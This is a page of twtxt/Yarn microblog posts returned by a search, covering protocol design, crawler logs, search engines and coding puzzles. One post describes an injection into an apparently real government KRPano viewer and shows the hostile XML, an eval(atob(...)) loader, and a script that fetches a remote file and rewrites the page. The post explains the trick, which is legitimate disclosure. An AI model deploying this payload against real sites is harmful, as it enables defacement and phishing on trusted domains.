yarn

twtxt.andros.dev

↳ In-reply-to » What does the #twtxt community think about having a p2p database to store all history? This will be managed by Registries.

@prologic@twtxt.net If it develops, and I’m not saying it will happen soon, perhaps Yarn could be connected as an additional node. Implementation would not be difficult for any client or software. It will not only be a backup of twtxt, but it will be the source for search, discovery and network health.

⤋ Read More

osnews

feeds.twtxt.net

Thu, Mar 6 10:00AM (51w ago)

Google, DuckDuckGo massively expand “AI” search results
Clearly, online search isn’t bad enough yet, so Google is intensifying its efforts to continue speedrunning the downfall of Google Search. They’ve announced they’re going to show even more “AI”-generated answers in Search results, to more people. Today, we’re sharing that we’ve launched Gemini 2.0 for AI Overviews in the U.S. to help with harder questions, starting with coding, advanced math and multimodal queries, with mor … ⌘ Read more

⤋ Read More

eapl.me

Mon, Mar 3 10:28AM 2025 (1y ago)

↳ In-reply-to » @eapl.me There are several points that I like, but I want to highlight number 7. https://text.eapl.mx/a-few-ideas-for-a-next-twtxt-version #twtxt

looks good to me!

About alice’s hash, using SHA256, I get 96473b4f or 96473B4F for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.

Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1} which is ambiguous of which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1.

⤋ Read More

lyse

lyse.isobeef.org

Sat, Feb 15 2:30AM 2025 (1y ago)

↳ In-reply-to » @lyse Where? 🧐

@prologic@twtxt.net Of course you don’t notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley’s message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]“… in it. This text in square brackets is repeated numerous times. If you search his feed for closing square bracket followed by an opening square bracket (][) you will find a bunch more of these. It goes without question he never typed that in his feed. My client saves each twt hash I’ve explicitly marked read. A few days ago, I got plenty of apparently years old, yet suddenly unread messages. Each and every single one of them containing this repeated bracketed text thing. The only conclusion is that something messed up the feed again.

⤋ Read More

lyse

lyse.isobeef.org

Thu, Feb 13 12:30PM 2025 (1y ago)

↳ In-reply-to » @lyse Where? 🧐

@prologic@twtxt.net @xuu@txt.sour.is There:

Just search for ][ in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.

⤋ Read More

bmallred

staystrong.run

Wed, Feb 12 9:37AM 2025 (1y ago)

reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

(810) bingbot
(641) Googlebot
(624) http://www.google.com/bot.html
(545) DotBot
(290) GPTBot
(106) SemrushBot
(84) AhrefsBot
(62) MJ12bot
(60) BLEXBot
(55) wpbot
(37) Amazonbot
(28) YandexBot
(22) ClaudeBot
(19) AwarioBot
(14) https://domainsbot.com/pandalytics
(9) https://serpstatbot.com
(6) t3versionsBot
(6) archive.org_bot
(6) Applebot
(5) http://search.msn.com/msnbot.htm
(4) http://www.googlebot.com/bot.html
(4) Googlebot-Mobile
(4) DuckDuckGo-Favicons-Bot
(3) https://turnitin.com/robot/crawlerinfo.html
(3) YandexNews
(3) ImagesiftBot
(2) Qwantify-prod
(1) http://www.google.com/adsbot.html
(1) http://gais.cs.ccu.edu.tw/robot.php
(1) YaK
(1) WBSearchBot
(1) DataForSeoBot

i have placed some middleware to reject these for now but it is not a full proof solution.

⤋ Read More

lyse

lyse.isobeef.org

Fri, Feb 7 6:15PM 2025 (1y ago)

↳ In-reply-to » (#bhpz3uq) They fixed it. :-D https://www.youtube.com/watch?v=A8b7HFUXPqk

Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.

⤋ Read More

johanbove

johanbove.info

Wed, Jan 29 3:49PM 2025 (1y ago)

Reading “Man’s search for meaning” by Viktor E. Frankl

⤋ Read More

xkcd-com

feeds.twtxt.net

Tue, Jan 21 7:00PM 2025 (1y ago)

Unit Circle
⌘ Read more

⤋ Read More

aelaraji

aelaraji.com

Sun, Jan 19 7:49PM 2025 (1y ago)

↳ In-reply-to » Google Begins Requiring JavaScript For Google Search Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to "better protect" Google Search against malicious activity, such as bots and spam, and to improve the over ... ⌘ Read more

@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘

⤋ Read More

osnews

feeds.twtxt.net

Sat, Jan 18 3:27PM 2025 (1y ago)

Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more

⤋ Read More

slashdot

feeds.twtxt.net

Fri, Jan 17 12:50PM 2025 (1y ago)

Google Begins Requiring JavaScript For Google Search
Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the over … ⌘ Read more

⤋ Read More

xuu

txt.sour.is

Tue, Jan 14 11:14PM 2025 (1y ago)

↳ In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

⤋ Read More

prologic

twtxt.net

Tue, Jan 14 5:06PM 2025 (1y ago)

↳ In-reply-to » @prologic uhhh what happened to search.twtxt.net

@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can’t afford to run the search engine right now on the remaining two nodes 😢😢

⤋ Read More

lime360

lime360.nekoweb.org

Tue, Jan 14 12:44PM 2025 (1y ago)

@prologic@twtxt.net uhhh what happened to search.twtxt.net

⤋ Read More

lime360

lime360.nekoweb.org

Tue, Jan 14 12:44PM 2025 (1y ago)

@prologic@twtxt.net uhhh what happened to search.twtxt.net

⤋ Read More

lime360

yoyle.city

Tue, Jan 14 12:44PM 2025 (1y ago)

@prologic@twtxt.net uhhh what happened to search.twtxt.net

⤋ Read More

eapl.me

Mon, Jan 6 1:24PM 2025 (1y ago)

↳ In-reply-to » @eapl.me And here I always lived by:

nice! would you mind elaborating a bit?
Is that the scientific method?
I couldn’t find anything related when I searched for it.

⤋ Read More

falsifian

www.falsifian.org

Sat, Jan 4 12:27PM 2025 (1y ago)

@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.

⤋ Read More

andros

twtxt.andros.dev

Thu, Jan 2 12:12PM 2025 (1y ago)

@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, an search API

⤋ Read More

doesnm

doesnm.p.psf.lt

Sat, Dec 28 2:40AM 2024 (1y ago)

Remembered about one ISP which disallow IRC stuff on his servers. By searching i found what it’s many ISP’s which equals IRC to proxy and doorways. This is unfair!

⤋ Read More

lime360

lime360.nekoweb.org

Thu, Dec 12 10:18AM 2024 (1y ago)

clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi

⤋ Read More

lime360

lime360.nekoweb.org

Thu, Dec 12 10:18AM 2024 (1y ago)

clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi

⤋ Read More

lime360

yoyle.city

Thu, Dec 12 10:18AM 2024 (1y ago)

clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi

⤋ Read More

aelaraji

aelaraji.com

Thu, Nov 28 10:40PM 2024 (1y ago)

↳ In-reply-to » Behold ... "Marginalia" ! My new favorite search engine!! And I have @mattof to thank for this find. Here's their Blog post about it since I don't think I could do a better job describing what it is. but, tl;dr: it's a #smallweb focused search engine.

… it even shows @sorenpeter@darch.dk’s article from 2020 in search results

⤋ Read More

aelaraji

aelaraji.com

Tue, Nov 26 7:21PM 2024 (1y ago)

↳ In-reply-to » Behold ... "Marginalia" ! My new favorite search engine!! And I have @mattof to thank for this find. Here's their Blog post about it since I don't think I could do a better job describing what it is. but, tl;dr: it's a #smallweb focused search engine.

@prologic@twtxt.net I cannot… believe… It took me a “Single Search Query” to get HOOKED!! 🤩 Bonus: tried it from terminal too and it works just 👌

⤋ Read More

aelaraji

aelaraji.com

Tue, Nov 26 4:00PM 2024 (1y ago)

Behold … “Marginalia” ! My new favorite search engine!! And I have @mattof to thank for this find. Here’s their Blog post about it since I don’t think I could do a better job describing what it is. but, tl;dr: it’s a #smallweb focused search engine.

⤋ Read More

prologic

twtxt.net

Wed, Nov 13 8:53PM 2024 (1y ago)

The web is such garbage these days 😔 Or is it the garbage search engines? 🤔

⤋ Read More

johanbove

johanbove.info

Mon, Nov 4 8:06AM 2024 (1y ago)

↳ In-reply-to » Wouldn't you rather have work and private seperated? Any thought behind this decission? I like tags, like Gmail does it. I still think mail needs a big rethink. It's too prominent in life, to be this archaic.

@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldi’s labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.

⤋ Read More

johanbove

johanbove.info

Thu, Oct 31 8:20AM 2024 (1y ago)

So I’ve flattened my work and private email inboxes to single inbox folders and I don’t even know anymore what I was thinking before trying frantically to organise everything in sub folders. Labels and search filters are the way forward.

⤋ Read More

xuu

txt.sour.is

Thu, Oct 3 12:37AM 2024 (1y ago)

↳ In-reply-to » @prologic I wanted to wait for things to settle down. It’s still unclear to me in which direction we’re going – and if that new/different stuff is even possible to implement in jenny. That said, I’ve been really busy with private stuff these last few days, I’ve lost track of most of what you’re discussing. 🥴

I share I did write up an algorithm for it at some point I think it is lost in a git comment someplace. I’ll put together a pseudo/go code this week.

Super simple:

Making a reply:

If yarn has one use that. (Maybe do collision check?)
Make hash of twt raw no truncation.
Check local cache for shortest without collision
- in SQL: select len(subject) where head_full_hash like subject || '%'

Threading:

Get full hash of head twt
Search for twts
- in SQL: head_full_hash like subject || '%' and created_on > head_timestamp

The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.

⤋ Read More

falsifian

www.falsifian.org

Fri, Sep 27 9:44PM 2024 (1y ago)

Diving into mblaze, I think I’ve nearly* reached peek email geek.

Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).

EXAMPLES at https://git.vuxu.org/mblaze/tree/README

So far I’m using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.

*To get any closer, I think I’d have to hand-craft my own SMTP client or something.

⤋ Read More

falsifian

www.falsifian.org

Mon, Sep 23 11:54AM 2024 (1y ago)

↳ In-reply-to » #fzf is the new emacs: a tool with a simple purpose that has evolved to include an #email client. https://sr.ht/~rakoo/omail/

@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.

⤋ Read More

prologic

twtxt.net

Sun, Sep 22 4:50AM 2024 (1y ago)

So I’m a location based system, how exactly do I reply to one of these two Twts from @Yarns@search.twtxt.net ? 🤔

2024-09-07T12:55:56Z	🥳 NEW FEED: @<twtxt http://edsu.github.io/twtxt/twtxt.txt>
2024-09-07T12:55:56Z	🥳 NEW FEED: @<kdy https://twtxt.kdy.ch/twtxt.txt>

⤋ Read More

david

collantes.us

Fri, Sep 20 1:05PM 2024 (1y ago)

↳ In-reply-to » @prologic Do you have a link to some past discussion?

@falsifian@www.falsifian.org comments on the feeds as in nick, url, follow, that kind of thing? If that, then not interested at all. I envision an archive that would allow searching, and potentially browsing threads on a nice, neat interface. You will have to think, though, on other things. Like, what to do with images? Yarn allows users to upload images, but also embed it in twtxts from other sources (hotlinking, actually).

⤋ Read More

falsifian

www.falsifian.org

Wed, Sep 4 11:50PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I don’t know how things work out in practice, but just based on reading, I don’t see why it can’t be an API for a crawling search engine. (In fact I don’t see anything in the spec indicating registry servers shouldn’t crawl.)

(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends “The registries should sync each others user list by using the users endpoint”. If I understood that right, registering with one should be enough to appear on others, even if they don’t crawl.)

Does yarnd provide an API for finding twts? Is it similar?

⤋ Read More

falsifian

www.falsifian.org

Wed, Sep 4 9:55PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?

⤋ Read More

falsifian

www.falsifian.org

Wed, Sep 4 9:22PM 2024 (1y ago)

↳ In-reply-to » @movq Is there a good way to get jenny to do a one-off fetch of a feed, for when you want to fill in missing parts of a thread? I just added @slashdot to my private follow file just because @prologic keeps responding to the feed :-P and I want to know what he's commenting on even though I don't want to see every new slashdot twt.

@prologic@twtxt.net What’s the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?

⤋ Read More

quark

ferengi.one

Sun, Aug 25 5:45PM 2024 (1y ago)

↳ In-reply-to » @movq is there a way to purge twtxts from a feed I no longer follow?

Never mind, I simply searched and deleted them all (D then ~f sender). :-) Phew!

⤋ Read More

aelaraji

aelaraji.com

Fri, Aug 23 8:34PM 2024 (1y ago)

↳ In-reply-to » 🥳 NEW FEED: @aelaraji

@Yarns@search.twtxt.net An oopsie? 🥳😂

⤋ Read More

sorenpeter

darch.dk

Sat, Jun 29 2:14PM 2024 (1y ago)

↳ In-reply-to » Can anyone recommend and/or vouch for a Chrome/browser extension that lets me write rewrite rules for arbitrary links on a page? e.g: s/(www\.)?youtube.com\/watch?v=([^?]+)/tubeproxy.mills.io/play/\1 for example? 🤔

Have not tried any of them, but some of these seem to fit the bill:

⤋ Read More

aelaraji

aelaraji.com

Thu, May 23 3:27PM 2024 (1y ago)

↳ In-reply-to » QOTD: Which web search engine do you use? 😂

@movq@www.uninformativ.de I’ve been using Qwant for a while but it was down earlier today (as well 😆) so I switched back to my trusty Searx Redirector

… This utility forwards your search query to one of 11 random volunteer-run public servers to thwart mass surveillance.

⤋ Read More

movq

www.uninformativ.de

Thu, May 23 3:07PM 2024 (1y ago)

QOTD: Which web search engine do you use? 😂

⤋ Read More

prologic

twtxt.net

Sat, Apr 27 11:58PM 2024 (1y ago)

Hah 🤣 @dfaria@twtxt.net Your @dfaria.eu@dfaria.eu feed really does consume about >50% of a “Discover” search with filters “Without replies” and “Hide my posts”. 🤣 36/2 = 18 at 25 Twts per page, that’s about ~72% of the search/view real estate you’re taking up! wow 🤩 – I’d be very interested to hear what ideas you have to improve this? Those search filters were created so you could sift through either your own Timeline or the Discover view easily.

⤋ Read More

sorenpeter

darch.dk

Fri, Apr 5 4:58PM 2024 (1y ago)

Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.eu🙏

Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt

⤋ Read More

prx

si3t.ch

Fri, Mar 1 12:08PM 2024 (2y ago)

On trouve de ces trucs… Là, plein de livres au format texte brut: https://github.com/ganesh-k13/shell/tree/master/test_search/www.glozman.com/TextPages

⤋ Read More

slashdot

feeds.twtxt.net

Tue, Jan 23 1:00PM 2024 (2y ago)

Google Chrome Gains AI Features Including a Writing Helper
Google is adding new AI features to Chrome, including tools to organize browser tabs, customize themes, and assist users with writing online content such as reviews and forum posts.

The writing helper is similar to an AI-powered feature already offered in Google’s experimental search experience, SGE, which helps users draft emails in various tones and lengths. W … ⌘ Read more

⤋ Read More

xuu

txt.sour.is

Tue, Jan 9 3:59PM 2024 (2y ago)

↳ In-reply-to » man... day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.

So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)

I implemented a Fibonacci Heap to replace the priority queue to great success.

https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268

⤋ Read More

xuu

txt.sour.is

Tue, Jan 2 10:58PM 2024 (2y ago)

↳ In-reply-to » @xuu That was one of the horror puzzles where I had to look for help. 🥴 I modelled my solution after this: https://www.youtube.com/watch?v=2pDSooPLLkI (I can’t explain it better than the video anyway.) It takes a second on my machine and that’s with my own hashmap implementation which is probably not the fastest one.

OH MY FREAKING HECK. So.. I made my pather able to run as Dijkstra or A* if the interface includes a heuristic.. when i tried without the heuristic it finished faster :|

So now to figure out why its not working right.

⤋ Read More

xuu

txt.sour.is

Mon, Jan 1 12:03PM 2024 (2y ago)

man… day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.

Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go
A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go

some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesn’t give me the right answer

⤋ Read More

Searching yarn